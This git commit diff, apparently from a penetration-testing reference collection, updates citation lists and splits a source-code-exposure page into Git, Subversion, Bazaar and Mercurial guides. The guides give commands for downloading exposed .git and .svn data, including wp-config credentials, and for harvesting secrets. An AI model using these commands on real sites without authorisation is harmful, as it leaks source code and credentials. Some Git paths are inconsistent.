References updated for IDOR, Radomness and SCM

This commit is contained in:
Swissky 2024-11-07 12:17:38 +01:00
parent 7e390265a0
commit ccffaa5019
8 changed files with 384 additions and 308 deletions

View File

@ -26,7 +26,7 @@
## Labs
* [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
- [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
## Exploit
@ -132,13 +132,13 @@ Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID, some backend might respon
## References
* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
* [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
* [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
* [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
* [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/)
* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
* [IDOR - how to predict an identifier? Bug bounty case study - Bug Bounty Reports Explained - ](https://youtu.be/wx5TwS0Dres)
* [Testing for IDORs - PortSwigger](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors)
* [Insecure direct object references (IDOR) - PortSwigger](https://portswigger.net/web-security/access-control/idor)
* [The Rise of IDOR - HackerOne - April 2nd, 2021](https://www.hackerone.com/company-news/rise-idor)
- [From Christmas present in the blockchain to massive bug bounty - Jesse Lakerveld - March 21, 2018](http://web.archive.org/web/20180401130129/https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
- [How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton - November 9, 2017](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
- [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - February 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
- [IDOR - how to predict an identifier? Bug bounty case study - Bug Bounty Reports Explained - September 21, 2023](https://youtu.be/wx5TwS0Dres)
- [Insecure Direct Object Reference Prevention Cheat Sheet - OWASP - July 31, 2023](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
- [Insecure direct object references (IDOR) - PortSwigger - December 25, 2019](https://portswigger.net/web-security/access-control/idor)
- [Testing for IDORs - PortSwigger - October 29, 2024](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors)
- [Testing for Insecure Direct Object References (OTG-AUTHZ-004) - OWASP - August 8, 2014](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
- [The Rise of IDOR - HackerOne - April 2, 2021](https://www.hackerone.com/company-news/rise-idor)
- [Web to App Phone Notification IDOR to view Everyone's Airbnb Messages - Brett Buerhaus - March 31, 2017](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/)

View File

@ -1,5 +1,12 @@
# Insecure Management Interface
## Summary
* [Springboot-Actuator](#springboot-actuator)
* [Remote Code Execution via /env](#remote-code-execution-via-env)
* [References](#references)
## Springboot-Actuator
Actuator endpoints let you monitor and interact with your application.
@ -88,7 +95,8 @@ Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
## References
* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
* [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
- [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
- [Springboot - Official Documentation - May 9, 2024](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)

View File

@ -166,10 +166,10 @@ Generic identification and sandwitch attack:
## References
* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
* [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
* [[FR] Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de loutil “Reset Tolkien” - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html)
* [[EN] Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html)
* [Secret non sécurisé basé sur le temps et attaques par sandwich - Tom CHAMBARETAUD aka Aethlios](#)
* [Exploiting Weak Pseudo-Random Number Generation in PHPs rand and srand Functions - Jacob Moore - Oct 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01)
* [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - 06 January, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction)
- [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
- [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
- [Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de loutil “Reset Tolkien” - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html) *(FR)*
- [Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html) *(EN)*
- [Multi-sandwich attack with MongoDB Object ID or the scenario for real-time monitoring of web application invitations: a new use case for the sandwich attack - Tom CHAMBARETAUD (@AethliosIK) - July 18, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/multi-sandwich-article-en.html)
- [Exploiting Weak Pseudo-Random Number Generation in PHPs rand and srand Functions - Jacob Moore - October 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01)
- [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - January 6, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction)

View File

@ -0,0 +1,47 @@
# Bazaar
## Summary
* [Tools](#tools)
* [rip-bzr.pl](#rip-bzrpl)
* [bzr_dumper](#bzr_dumper)
* [References](#references)
## Tools
### rip-bzr.pl
```powershell
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
```
### bzr_dumper
```powershell
git clone https://github.com/SeahunOh/bzr_dumper
python3 dumper.py -u "http://127.0.0.1:5000/" -o source
Created a standalone tree (format: 2a)
[!] Target : http://127.0.0.1:5000/
[+] Start.
[+] GET repository/pack-names
[+] GET README
[+] GET checkout/dirstate
[+] GET checkout/views
[+] GET branch/branch.conf
[+] GET branch/format
[+] GET branch/last-revision
[+] GET branch/tag
[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
[*] Finish
$ bzr revert
N application.py
N database.py
N static/
```
## References
- [STEM CTF Cyber Challenge 2019 My First Blog - m3ssap0 / zuzzur3ll0n1 - March 2, 2019](https://ctftime.org/writeup/13380)

View File

@ -0,0 +1,221 @@
# Git
## Summary
* [Example](#example)
* [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
* [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
* [Tools](#tools)
* [Automatic recovery](#automatic-recovery)
* [git-dumper.py](#git-dumperpy)
* [diggit.py](#diggitpy)
* [GoGitDumper](#gogitdumper)
* [rip-git](#rip-git)
* [GitHack](#githack)
* [GitTools](#gittools)
* [Harvesting secrets](#harvesting-secrets)
* [trufflehog](#trufflehog)
* [Yar](#yar)
* [Gitrob](#gitrob)
* [Gitleaks](#gitleaks)
* [Refererences]
## Example
The following examples will create either a copy of the .git or a copy of the current commit.
Check for the following files, if they exist you can extract the .git folder.
- .git/config
- .git/HEAD
- .git/logs/HEAD
### Recovering file contents from .git/logs/HEAD
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
```powershell
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
```
3. Access the commit using the hash
```powershell
# create an empty .git repository
git init test
cd test/.git
# download the file
wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
# first byte for subdirectory, remaining bytes for filename
mkdir .git/object/26
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
# display the file
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael <michael@easyctf.com> 1489390329 +0000
committer Michael <michael@easyctf.com> 1489390329 +0000
Initial.
```
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
```powershell
wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
mkdir .git/object/32
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
```
5. Read the data (flag.txt)
```powershell
wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
mkdir .git/object/cb
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
```
### Recovering file contents from .git/index
Use the git index file parser https://pypi.python.org/pypi/gin (python3).
```powershell
pip3 install gin
gin ~/git-repo/.git/index
```
Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
```powershell
$ gin .git/index | egrep -e "name|sha1"
name = AWS Amazon Bucket S3/README.md
sha1 = 862a3e58d138d6809405aa062249487bee074b98
name = CRLF injection/README.md
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
```
## Tools
### Automatic recovery
#### git-dumper.py
```powershell
git clone https://github.com/arthaud/git-dumper
pip install -r requirements.txt
./git-dumper.py http://web.site/.git ~/website
```
#### diggit.py
```powershell
git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
-u is remote path, where .git folder exists
-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
-o is a hash of particular Git object to download
```
#### GoGitDumper
```powershell
go get github.com/c-sto/gogitdumper
gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/
git log
git checkout
```
#### rip-git
```powershell
git clone https://github.com/kost/dvcs-ripper
perl rip-git.pl -v -u "http://web.site/.git/"
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael <michael@easyctf.com> 1489389105 +0000
committer Michael <michael@easyctf.com> 1489389105 +0000
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
```
#### GitHack
```powershell
git clone https://github.com/lijiejie/GitHack
GitHack.py http://web.site/.git/
```
#### GitTools
```powershell
git clone https://github.com/internetwache/GitTools
./gitdumper.sh http://target.tld/.git/ /tmp/destdir
git checkout -- .
```
### Harvesting secrets
#### trufflehog
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
```powershell
pip install truffleHog # https://github.com/dxa4481/truffleHog
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
```
#### Yar
> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.
```powershell
go get github.com/nielsing/yar # https://github.com/nielsing/yar
yar -o orgname --both
```
#### Gitrob
> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
```powershell
go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
gitrob [options] target [target2] ... [targetN]
```
#### Gitleaks
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
```powershell
# Run gitleaks against a public repository
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
# Run gitleaks against a local repository already cloned into /tmp/
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
# Run gitleaks against a specific Github Pull request
docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
or
go get -u github.com/zricethezav/gitleaks
```
## References
- [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/)

View File

@ -0,0 +1,22 @@
# Mercurial
## Summary
* [Tools](#tools)
* [rip-hg.pl](#rip-hgpl)
* [References](#references)
## Tools
### rip-hg.pl
* [kost/dvcs-ripper/master/rip-hg.pl](https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl) - Rip web accessible (distributed) version control systems: SVN/GIT/HG...
```powershell
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u
```
## References
* [my-chemical-romance - siunam - Feb 13, 2023](https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/)

View File

@ -1,308 +1,46 @@
# Insecure Source Code Management
* [Git](#git)
* [Example](#example)
* [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
* [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
* [Tools](#tools)
* [Automatic recovery](#automatic-recovery)
* [git-dumper.py](#git-dumperpy)
* [diggit.py](#diggitpy)
* [GoGitDumper](#gogitdumper)
* [rip-git](#rip-git)
* [GitHack](#githack)
* [GitTools](#gittools)
* [Harvesting secrets](#harvesting-secrets)
* [trufflehog](#trufflehog)
* [Yar](#yar)
* [Gitrob](#gitrob)
* [Gitleaks](#gitleaks)
* [Subversion](#subversion)
* [Example (Wordpress)](#example-wordpress)
* [Tools](#tools-1)
* [svn-extractor](#svn-extractor)
* [Bazaar](#bazaar)
* [Tools](#tools-2)
* [rip-bzr.pl](#rip-bzrpl)
* [bzr_dumper](#bzr_dumper)
* [Mercurial](#mercurial)
* [Tools](#tools-3)
* [rip-hg.pl](#rip-hgpl)
* [References](#references)
Insecure Source Code Management (SCM) can lead to several critical vulnerabilities in web applications and services. Developers often rely on SCM systems like Git and Subversion (SVN) to manage their source code versions. However, poor security practices, such as leaving .git and .svn folders in production environments exposed to the internet, can pose significant risks.
## Git
The following examples will create either a copy of the .git or a copy of the current commit.
## Summary
Check for the following files, if they exist you can extract the .git folder.
* [Bazaar](./Bazaar.md)
* [Git](./Git.md)
* [Mercurial](./Mercurial.md)
* [Subversion](./Subversion.md)
* [Methodology](#methodology)
- .git/config
- .git/HEAD
- .git/logs/HEAD
### Example
## Methodology
#### Recovering file contents from .git/logs/HEAD
Exposing the version control system folders on a web server can lead to severe security risks, including:
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too)
```powershell
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
```
3. Access the commit using the hash
```powershell
# create an empty .git repository
git init test
cd test/.git
- **Source Code Leaks** : Attackers can download the entire source code repository, gaining access to the application's logic.
- **Sensitive Information Exposure** : Embedded secrets, configuration files, and credentials might be present within the codebase.
- **Commit History Exposure** : Attackers can view past changes, revealing sensitive information that might have been previously exposed and later mitigated.
# download the file
wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
The first step is to gather information about the target application. This can be done using various web reconnaissance tools and techniques.
# first byte for subdirectory, remaining bytes for filename
mkdir .git/object/26
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
* **Manual Inspection** : Check URLs manually by navigating to common SCM paths.
* http://target.com/.git/
* http://target.com/.svn/
* **Automated Tools** : Refer to the page related to the specific technology.
# display the file
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael <michael@easyctf.com> 1489390329 +0000
committer Michael <michael@easyctf.com> 1489390329 +0000
Initial.
```
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
```powershell
wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
mkdir .git/object/32
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
Once a potential SCM folder is identified, check the HTTP response codes and contents. You might need to bypass `.htaccess` or Reverse Proxy rules.
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
```
5. Read the data (flag.txt)
```powershell
wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
mkdir .git/object/cb
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
```
The NGINX rule below returns a `403 (Forbidden)` response instead of `404 (Not Found)` when hitting the `/.git` endpoint.
#### Recovering file contents from .git/index
Use the git index file parser https://pypi.python.org/pypi/gin (python3).
```powershell
pip3 install gin
gin ~/git-repo/.git/index
```ps1
location /.git {
deny all;
}
```
Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
For example in Git, the exploitation technique doesn't require to list the content of the `.git` folder (http://target.com/.git/), the data extraction can still be conducted when files can be read.
```powershell
$ gin .git/index | egrep -e "name|sha1"
name = AWS Amazon Bucket S3/README.md
sha1 = 862a3e58d138d6809405aa062249487bee074b98
name = CRLF injection/README.md
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
```
### Tools
#### Automatic recovery
##### git-dumper.py
```powershell
git clone https://github.com/arthaud/git-dumper
pip install -r requirements.txt
./git-dumper.py http://web.site/.git ~/website
```
##### diggit.py
```powershell
git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
-u is remote path, where .git folder exists
-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
-o is a hash of particular Git object to download
```
##### GoGitDumper
```powershell
go get github.com/c-sto/gogitdumper
gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/
git log
git checkout
```
##### rip-git
```powershell
git clone https://github.com/kost/dvcs-ripper
perl rip-git.pl -v -u "http://web.site/.git/"
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael <michael@easyctf.com> 1489389105 +0000
committer Michael <michael@easyctf.com> 1489389105 +0000
git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
```
##### GitHack
```powershell
git clone https://github.com/lijiejie/GitHack
GitHack.py http://web.site/.git/
```
##### GitTools
```powershell
git clone https://github.com/internetwache/GitTools
./gitdumper.sh http://target.tld/.git/ /tmp/destdir
git checkout -- .
```
#### Harvesting secrets
##### trufflehog
> Searches through git repositories for high entropy strings and secrets, digging deep into commit history.
```powershell
pip install truffleHog # https://github.com/dxa4481/truffleHog
truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
```
##### Yar
> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog.
```powershell
go get github.com/nielsing/yar # https://github.com/nielsing/yar
yar -o orgname --both
```
##### Gitrob
> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
```powershell
go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
gitrob [options] target [target2] ... [targetN]
```
##### Gitleaks
> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories.
```powershell
# Run gitleaks against a public repository
docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git
# Run gitleaks against a local repository already cloned into /tmp/
docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks
# Run gitleaks against a specific Github Pull request
docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000
or
go get -u github.com/zricethezav/gitleaks
```
## Subversion
### Example (Wordpress)
```powershell
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
```
1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
```powershell
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
```
2. Download interesting files
* remove \$sha1\$ prefix
* add .svn-base postfix
* use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
### Tools
#### svn-extractor
```powershell
git clone https://github.com/anantshri/svn-extractor.git
python svn-extractor.py url "url with .svn available"
```
## Bazaar
### Tools
#### rip-bzr.pl
```powershell
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
```
#### bzr_dumper
```powershell
git clone https://github.com/SeahunOh/bzr_dumper
python3 dumper.py -u "http://127.0.0.1:5000/" -o source
Created a standalone tree (format: 2a)
[!] Target : http://127.0.0.1:5000/
[+] Start.
[+] GET repository/pack-names
[+] GET README
[+] GET checkout/dirstate
[+] GET checkout/views
[+] GET branch/branch.conf
[+] GET branch/format
[+] GET branch/last-revision
[+] GET branch/tag
[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
[*] Finish
$ bzr revert
N application.py
N database.py
N static/
```
## Mercurial
### Tools
#### rip-hg.pl
```powershell
wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl
docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u
```
## References
- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
- [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit)
- [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/)
- [Hidden directories and files as a source of sensitive information about web application - Apr 30, 2017](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)

View File

@ -0,0 +1,40 @@
# Subversion
## Summary
* [Examples](#examples)
* [Tools](#tools)
* [svn-extractor](#svn-extractor)
* [References](#references)
## Examples
```powershell
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
```
1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
```powershell
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
```
2. Download interesting files
* remove \$sha1\$ prefix
* add .svn-base postfix
* use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
## Tools
### svn-extractor
* [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network.
```powershell
python svn-extractor.py --url "url with .svn available"
```
## References
- [SVN Extractor for Web Pentesters - Anant Shrivastava - March 26, 2013](http://blog.anantshri.info/svn-extractor-for-web-pentesters/)